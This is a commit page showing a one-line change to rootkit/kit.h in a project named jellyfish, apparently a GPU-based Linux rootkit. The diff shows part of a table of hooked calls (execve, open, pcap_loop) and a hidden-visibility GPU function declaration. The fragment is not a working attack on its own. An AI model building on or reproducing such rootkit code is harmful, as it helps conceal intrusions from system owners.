Projects STRLCPY jellyfish Commits af0658c4
🤬
  • ■ ■ ■ ■ ■
    rootkit/kit.h
    skipped 92 lines
    93 93  syscall_table[5] = "execve";
    94 94  syscall_table[6] = "open";
    95 95  syscall_table[7] = "pcap_loop";
     96 +syscall_table[8] = "SYSCALL_SIZE";
    96 97   
    97 98  // hidden gpu functions
    98 99  cl_device_id create_device(void) __attribute__((visibility("hidden")));
    skipped 10 lines
Please wait...
Page is in error, reload to recover